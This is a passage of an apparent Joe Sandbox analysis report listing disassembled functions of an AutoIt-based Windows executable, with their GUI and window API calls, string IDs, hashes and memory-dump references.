                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BuffCharUpper
                                                                                                                                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                                                              • API String ID: 3964851224-45149045
                                                                                                                                                                              • Opcode ID: 2aa4601292142d3b3f12ddee799f12b9ee202fc2376d6b6267f06e3777c19cd7
                                                                                                                                                                              • Instruction ID: e26c6d12936d3ba9b979f3f809c5e07974a8a0b50f6c7d1beaa7c65fad437c05
                                                                                                                                                                              • Opcode Fuzzy Hash: 2aa4601292142d3b3f12ddee799f12b9ee202fc2376d6b6267f06e3777c19cd7
                                                                                                                                                                              • Instruction Fuzzy Hash: FFC188342042018BDB04EF15C451BAE7BD6BF94398F44486EB8425B3D6DB39DD8BCB56
                                                                                                                                                                              Function 0051D385 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetSysColor.USER32(00000012), ref: 0051D3BE
                                                                                                                                                                              • SetTextColor.GDI32(?,?), ref: 0051D3C2
                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0051D3D8
                                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 0051D3E3
                                                                                                                                                                              • CreateSolidBrush.GDI32(?), ref: 0051D3E8
                                                                                                                                                                              • GetSysColor.USER32(00000011), ref: 0051D400
                                                                                                                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0051D40E
                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 0051D41F
                                                                                                                                                                              • SetBkColor.GDI32(?,00000000), ref: 0051D428
                                                                                                                                                                              • SelectObject.GDI32(?,?), ref: 0051D435
                                                                                                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0051D454
                                                                                                                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0051D46B
                                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0051D480
                                                                                                                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0051D4A8
                                                                                                                                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0051D4CF
                                                                                                                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 0051D4ED
                                                                                                                                                                              • DrawFocusRect.USER32(?,?), ref: 0051D4F8
                                                                                                                                                                              • GetSysColor.USER32(00000011), ref: 0051D506
                                                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0051D50E
                                                                                                                                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0051D522
                                                                                                                                                                              • SelectObject.GDI32(?,0051D0B5), ref: 0051D539
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0051D544
                                                                                                                                                                              • SelectObject.GDI32(?,?), ref: 0051D54A
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0051D54F
                                                                                                                                                                              • SetTextColor.GDI32(?,?), ref: 0051D555
                                                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 0051D55F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1996641542-0
                                                                                                                                                                              • Opcode ID: ec120159e3fd664c92c1d15a4ee9d0504d518fe49ad6ead3e741862f3e506e9e
                                                                                                                                                                              • Instruction ID: 52dfc6dc0ed13f9c3528ca3a5f6324a9eac203098cf61045a43fdfb628572148
                                                                                                                                                                              • Opcode Fuzzy Hash: ec120159e3fd664c92c1d15a4ee9d0504d518fe49ad6ead3e741862f3e506e9e
                                                                                                                                                                              • Instruction Fuzzy Hash: E2513D72900218AFDF109FA4EC48EEE7BB9FB18320F104515F915AB2A1D7759944DB60
                                                                                                                                                                              Function 0051B4D4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0051B5C0
                                                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0051B5D1
                                                                                                                                                                              • CharNextW.USER32(0000014E), ref: 0051B600
                                                                                                                                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0051B641
                                                                                                                                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0051B657
                                                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0051B668
                                                                                                                                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0051B685
                                                                                                                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0051B6D7
                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0051B6ED
                                                                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 0051B71E
                                                                                                                                                                              • _memset.LIBCMT ref: 0051B743
                                                                                                                                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0051B78C
                                                                                                                                                                              • _memset.LIBCMT ref: 0051B7EB
                                                                                                                                                                              • SendMessageW.USER32 ref: 0051B815
                                                                                                                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 0051B86D
                                                                                                                                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 0051B91A
                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0051B93C
                                                                                                                                                                              • GetMenuItemInfoW.USER32(?), ref: 0051B986
                                                                                                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0051B9B3
                                                                                                                                                                              • DrawMenuBar.USER32(?), ref: 0051B9C2
                                                                                                                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0051B9EA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 1073566785-4108050209
                                                                                                                                                                              • Opcode ID: 4907f1ed568022e2a421b7f3b859671dfd42336b96e4fc004ee2aaa89bebd72a
                                                                                                                                                                              • Instruction ID: 4bb2f065eae7e7022afd1f2783c071f5cfd9ba7d8cf2d6aaa3058c8d1bd0349f
                                                                                                                                                                              • Opcode Fuzzy Hash: 4907f1ed568022e2a421b7f3b859671dfd42336b96e4fc004ee2aaa89bebd72a
                                                                                                                                                                              • Instruction Fuzzy Hash: 45E18B71900218AAFF209F51DC85EEE7FB9FF05714F10815AF929AB290DB748A84DF60
                                                                                                                                                                              Function 0051744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00517587
                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 0051759C
                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 005175A3
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00517605
                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00517631
                                                                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0051765A
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00517678
                                                                                                                                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0051769E
                                                                                                                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 005176B3
                                                                                                                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 005176C6
                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 005176E6
                                                                                                                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00517701
                                                                                                                                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00517715
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0051772D
                                                                                                                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00517753
                                                                                                                                                                              • GetMonitorInfoW.USER32 ref: 0051776D
                                                                                                                                                                              • CopyRect.USER32(?,?), ref: 00517784
                                                                                                                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 005177EF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                              • String ID: ($0$tooltips_class32
                                                                                                                                                                              • API String ID: 698492251-4156429822
                                                                                                                                                                              • Opcode ID: c45035241f5b7a86bf6fc3319d425587face3dfe09b3c8c2fb92bc47d8f4be2d
                                                                                                                                                                              • Instruction ID: c220941e82fe2b87ee4085a4c1d4d851dd99f271af5076f5ee346bb6a48dbc58
                                                                                                                                                                              • Opcode Fuzzy Hash: c45035241f5b7a86bf6fc3319d425587face3dfe09b3c8c2fb92bc47d8f4be2d
                                                                                                                                                                              • Instruction Fuzzy Hash: F7B19E71608300AFEB04DF68C985BAABBF5FF88314F00891DF5999B291D774E844CBA5
                                                                                                                                                                              Function 004CA756 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004CA839
                                                                                                                                                                              • GetSystemMetrics.USER32(00000007), ref: 004CA841
                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004CA86C
                                                                                                                                                                              • GetSystemMetrics.USER32(00000008), ref: 004CA874
                                                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 004CA899
                                                                                                                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 004CA8B6
                                                                                                                                                                              • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 004CA8C6
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 004CA8F9
                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 004CA90D
                                                                                                                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 004CA92B
                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 004CA947
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 004CA952
                                                                                                                                                                                • Part of subcall function 004CB736: GetCursorPos.USER32(000000FF), ref: 004CB749
                                                                                                                                                                                • Part of subcall function 004CB736: ScreenToClient.USER32(00000000,000000FF), ref: 004CB766
                                                                                                                                                                                • Part of subcall function 004CB736: GetAsyncKeyState.USER32(00000001), ref: 004CB78B
                                                                                                                                                                                • Part of subcall function 004CB736: GetAsyncKeyState.USER32(00000002), ref: 004CB799
                                                                                                                                                                              • SetTimer.USER32(00000000,00000000,00000028,004CACEE), ref: 004CA979
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                              • String ID: AutoIt v3 GUI
                                                                                                                                                                              • API String ID: 1458621304-248962490
                                                                                                                                                                              • Opcode ID: bfe3eab459bb48f61b7b19e90c66f27d0453ce033c8aca0c19b0def5deafaeed
                                                                                                                                                                              • Instruction ID: e47952e4cd301c4a974cfa1798eb7d0e4807169dcfac575dd9304b0ea2b86405
                                                                                                                                                                              • Opcode Fuzzy Hash: bfe3eab459bb48f61b7b19e90c66f27d0453ce033c8aca0c19b0def5deafaeed
                                                                                                                                                                              • Instruction Fuzzy Hash: 7BB18F7560020AAFDB14DFA8EC46FAE7BB4FF18318F10422AFA15A7290D734D851DB55
                                                                                                                                                                              Function 005169C5 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00516A52
                                                                                                                                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00516B12
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BuffCharMessageSendUpper
                                                                                                                                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                              • API String ID: 3974292440-719923060
                                                                                                                                                                              • Opcode ID: 25df89f7b867d8ac3c595c65ddccb6e7ce3e0cc06ad21a3130d5bd0f86ceccff
                                                                                                                                                                              • Instruction ID: 6a32fb65732eb4c13778cbe720fe192dc1f7fc277360117ad11d0bcceb9b8dbd
                                                                                                                                                                              • Opcode Fuzzy Hash: 25df89f7b867d8ac3c595c65ddccb6e7ce3e0cc06ad21a3130d5bd0f86ceccff
                                                                                                                                                                              • Instruction Fuzzy Hash: 3AA193342042019BDB04EF15C991FAABBE6FF44358F14486EB8969B3D2DB38EC49CB55
                                                                                                                                                                              Function 004EDD46 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 004EDD87
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004EDE28
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004EDE3B
                                                                                                                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 004EDE90
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004EDECC
                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 004EDF03
                                                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 004EDF55
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004EDF8B
                                                                                                                                                                              • GetParent.USER32(?), ref: 004EDFA9
                                                                                                                                                                              • ScreenToClient.USER32(00000000), ref: 004EDFB0
                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 004EE02A
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004EE03E
                                                                                                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 004EE064
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004EE078
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                                                                              • String ID: %s%u
                                                                                                                                                                              • API String ID: 3119225716-679674701
                                                                                                                                                                              • Opcode ID: 8ed79889a3d3e2383eac8d8f75fafcf067f055b9dbe910c2987b74b944c99d8d
                                                                                                                                                                              • Instruction ID: 6a7c07c58302f1f5d560d03e1cf8e97c92bc361e960856099742ed84b1f8e981
                                                                                                                                                                              • Opcode Fuzzy Hash: 8ed79889a3d3e2383eac8d8f75fafcf067f055b9dbe910c2987b74b944c99d8d
                                                                                                                                                                              • Instruction Fuzzy Hash: 8BA10131604746ABD714DF26C884FABB7A8FF54315F00852BF9A9C3290DB78E905CBA5
                                                                                                                                                                              Function 004EE69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 004EE6E1
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004EE6F2
                                                                                                                                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 004EE71A
                                                                                                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 004EE737
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004EE755
                                                                                                                                                                              • _wcsstr.LIBCMT ref: 004EE766
                                                                                                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 004EE79E
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004EE7AE
                                                                                                                                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 004EE7D5
                                                                                                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 004EE81E
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004EE82E
                                                                                                                                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 004EE856
                                                                                                                                                                              • GetWindowRect.USER32(00000004,?), ref: 004EE8BF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                                                              • String ID: @$ThumbnailClass
                                                                                                                                                                              • API String ID: 1788623398-1539354611
                                                                                                                                                                              • Opcode ID: f264c6a15a45ab40c0de2e212053fbd954dd2c14c90ab01af77fe8688beaa757
                                                                                                                                                                              • Instruction ID: 900a516a1f8edef4e22566393462418eec093717c7f192456dc3264aeac190ef
                                                                                                                                                                              • Opcode Fuzzy Hash: f264c6a15a45ab40c0de2e212053fbd954dd2c14c90ab01af77fe8688beaa757
                                                                                                                                                                              • Instruction Fuzzy Hash: 2981BE710042859BDB01DF13D881BAB7BE8FF54315F04846BFD899A292DB38DD46CBA9
                                                                                                                                                                              Function 004EE4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __wcsnicmp
                                                                                                                                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                                              • API String ID: 1038674560-1810252412
                                                                                                                                                                              • Opcode ID: 9131961253d2bc6f4ff7a439938e9ebbdacf22e8e4fac0a72b3e4da622701800
                                                                                                                                                                              • Instruction ID: 2f2150b00d76be13bc782b86bbf785f7dd713d30bc1e4c6f79d33e1104f43d16
                                                                                                                                                                              • Opcode Fuzzy Hash: 9131961253d2bc6f4ff7a439938e9ebbdacf22e8e4fac0a72b3e4da622701800
                                                                                                                                                                              • Instruction Fuzzy Hash: 2131C331944645B5EB14EB63CD53EEE77A46F20709F20002BF441721E5FF596F04C66A
                                                                                                                                                                              Function 004EF898 Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadIconW.USER32(00000063), ref: 004EF8AB
                                                                                                                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004EF8BD
                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 004EF8D4
                                                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 004EF8E9
                                                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004EF8EF
                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 004EF8FF
                                                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004EF905
                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004EF926
                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 004EF940
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004EF949
                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 004EF9B4
                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 004EF9BA
                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 004EF9C1
                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 004EFA0D
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004EFA1A
                                                                                                                                                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 004EFA3F
                                                                                                                                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 004EFA6A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
